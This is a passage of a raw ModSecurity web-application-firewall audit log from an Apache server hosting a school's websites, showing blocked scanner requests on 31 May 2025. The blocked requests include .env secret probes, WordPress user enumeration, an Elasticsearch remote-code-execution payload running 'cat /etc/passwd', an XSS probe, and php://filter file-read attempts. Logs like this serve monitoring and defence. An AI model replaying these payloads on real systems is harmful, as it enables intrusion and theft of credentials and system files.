8181 --45eebd2e-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 142.93.143.8 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 142.93.143.8 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --45eebd2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45eebd2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748658132165326 769 (- - -) Stopwatch2: 1748658132165326 769; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45eebd2e-Z-- --25ca0b13-A-- [31/May/2025:09:24:47 +0700] aDpob-g1nD2n5twq7NsutgAAAFI 103.236.140.4 33740 103.236.140.4 8181 --25ca0b13-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.0.2.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.0.2.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --25ca0b13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25ca0b13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748658287484675 2801 (- - -) Stopwatch2: 1748658287484675 2801; combined=1252, p1=412, p2=810, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25ca0b13-Z-- --bb533b61-A-- [31/May/2025:10:22:10 +0700] aDp14p3Kgs4r2wz12c6FBQAAAAQ 103.236.140.4 36462 103.236.140.4 8181 --bb533b61-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 193.203.224.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.203.224.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bb533b61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb533b61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748661730187534 2777 (- - -) Stopwatch2: 1748661730187534 2777; combined=1248, p1=425, p2=793, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb533b61-Z-- --6f67df3a-A-- [31/May/2025:10:29:40 +0700] aDp3pB_L2Rte6DjSjWYofQAAAJY 103.236.140.4 36594 103.236.140.4 8181 --6f67df3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 210.245.32.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 210.245.32.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6f67df3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f67df3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748662180882443 2542 (- - -) Stopwatch2: 1748662180882443 2542; combined=1152, p1=393, p2=731, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f67df3a-Z-- --88b29d49-A-- [31/May/2025:10:44:11 +0700] aDp7C-g1nD2n5twq7NsvrgAAAEU 103.236.140.4 36740 103.236.140.4 8181 --88b29d49-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.225.151.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.225.151.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --88b29d49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88b29d49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748663051459803 2797 (- - -) Stopwatch2: 1748663051459803 2797; combined=1237, p1=436, p2=772, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88b29d49-Z-- --55ac3a3a-A-- [31/May/2025:10:49:20 +0700] aDp8QOg1nD2n5twq7NsvsQAAAE8 103.236.140.4 36784 103.236.140.4 8181 --55ac3a3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.129.214.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.129.214.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --55ac3a3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55ac3a3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748663360305766 3053 (- - -) Stopwatch2: 1748663360305766 3053; combined=1369, p1=504, p2=836, p3=0, p4=0, p5=29, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55ac3a3a-Z-- --4e074b28-A-- [31/May/2025:10:49:27 +0700] aDp8R53Kgs4r2wz12c6FLAAAAAM 103.236.140.4 36790 103.236.140.4 8181 --4e074b28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept-Charset: utf-8 --4e074b28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e074b28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748663367185739 802 (- - -) Stopwatch2: 1748663367185739 802; combined=327, p1=276, p2=0, p3=0, p4=0, p5=51, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e074b28-Z-- --49681a54-A-- [31/May/2025:10:58:52 +0700] aDp-fFbZTRMbIzLSWp6C3QAAAMM 103.236.140.4 36836 103.236.140.4 8181 --49681a54-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G930A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --49681a54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49681a54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748663932509269 840 (- - -) Stopwatch2: 1748663932509269 840; combined=338, p1=295, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49681a54-Z-- --a41ac32f-A-- [31/May/2025:11:04:25 +0700] aDp_yeg1nD2n5twq7NsvugAAAEc 103.236.140.4 36904 103.236.140.4 8181 --a41ac32f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --a41ac32f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a41ac32f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748664265535884 787 (- - -) Stopwatch2: 1748664265535884 787; combined=312, p1=271, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a41ac32f-Z-- --7618e661-A-- [31/May/2025:11:06:56 +0700] aDqAYJ3Kgs4r2wz12c6FNQAAAAY 103.236.140.4 36914 103.236.140.4 8181 --7618e661-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.34.103.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.34.103.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7618e661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7618e661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748664416175716 3577 (- - -) Stopwatch2: 1748664416175716 3577; combined=1584, p1=594, p2=954, p3=0, p4=0, p5=36, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7618e661-Z-- --1abae819-A-- [31/May/2025:11:46:15 +0700] aDqJl53Kgs4r2wz12c6FTgAAABg 103.236.140.4 37168 103.236.140.4 8181 --1abae819-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 8.1.0; en-US; Infinix X624B Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.13.0.1207 Mobile Safari/537.36 Accept-Charset: utf-8 --1abae819-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1abae819-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748666775192200 944 (- - -) Stopwatch2: 1748666775192200 944; combined=407, p1=365, p2=0, p3=0, p4=0, p5=42, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1abae819-Z-- --0005560c-A-- [31/May/2025:12:48:07 +0700] aDqYF53Kgs4r2wz12c6FbQAAAA0 103.236.140.4 37626 103.236.140.4 8181 --0005560c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 183.91.75.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 183.91.75.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0005560c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0005560c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748670487703155 3334 (- - -) Stopwatch2: 1748670487703155 3334; combined=1478, p1=479, p2=966, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0005560c-Z-- --dd243a6d-A-- [31/May/2025:12:56:27 +0700] aDqaC53Kgs4r2wz12c6GJwAAAAU 103.236.140.4 42070 103.236.140.4 8181 --dd243a6d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.251.89.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.251.89.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dd243a6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd243a6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748670987589916 2657 (- - -) Stopwatch2: 1748670987589916 2657; combined=1413, p1=476, p2=905, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd243a6d-Z-- --14311c41-A-- [31/May/2025:13:00:18 +0700] aDqa8p3Kgs4r2wz12c6G-AAAABg 103.236.140.4 44848 103.236.140.4 8181 --14311c41-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.32.66 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.32.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --14311c41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14311c41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748671218700690 861 (- - -) Stopwatch2: 1748671218700690 861; combined=328, p1=295, p2=0, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14311c41-Z-- --ed667567-A-- [31/May/2025:13:40:27 +0700] aDqkW1bZTRMbIzLSWp6LyQAAAMI 103.236.140.4 47448 103.236.140.4 8181 --ed667567-B-- POST /_search?pretty HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 369 User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3.1 Safari/605.1.15 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 198.252.110.114 Cookie: X-Varnish: 166811582 --ed667567-C-- { "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream()).useDelimiter(\"\\\\A\").next();" } } } --ed667567-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed667567-E-- --ed667567-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /_search?pretty"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673627626114 2674 (- - -) Stopwatch2: 1748673627626114 2674; combined=898, p1=458, p2=393, p3=0, p4=0, p5=46, sr=77, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed667567-Z-- --5bda0861-A-- [31/May/2025:13:40:28 +0700] aDqkXOg1nD2n5twq7Ns7vQAAAFY 103.236.140.4 47424 103.236.140.4 8181 --5bda0861-B-- GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 166811588 --5bda0861-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5bda0861-E-- --5bda0861-H-- Message: Access denied with code 403 (phase 2). Pattern match "alert(document.domain)"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628464026 3094 (- - -) Stopwatch2: 1748673628464026 3094; combined=1380, p1=486, p2=855, p3=0, p4=0, p5=39, sr=95, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bda0861-Z-- --8055f719-A-- [31/May/2025:13:40:28 +0700] aDqkXFbZTRMbIzLSWp6LywAAAMo 103.236.140.4 47452 103.236.140.4 8181 --8055f719-B-- GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 153709557 --8055f719-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8055f719-E-- --8055f719-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748673628469288 1354 (- - -) Stopwatch2: 1748673628469288 1354; combined=415, p1=262, p2=97, p3=0, p4=0, p5=56, sr=54, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8055f719-Z-- --fa644f1a-A-- [31/May/2025:13:40:28 +0700] aDqkXJ3Kgs4r2wz12c6O9QAAABM 103.236.140.4 47440 103.236.140.4 8181 --fa644f1a-B-- GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 198.252.110.114 Accept-Encoding: gzip X-Varnish: 169192930 --fa644f1a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN 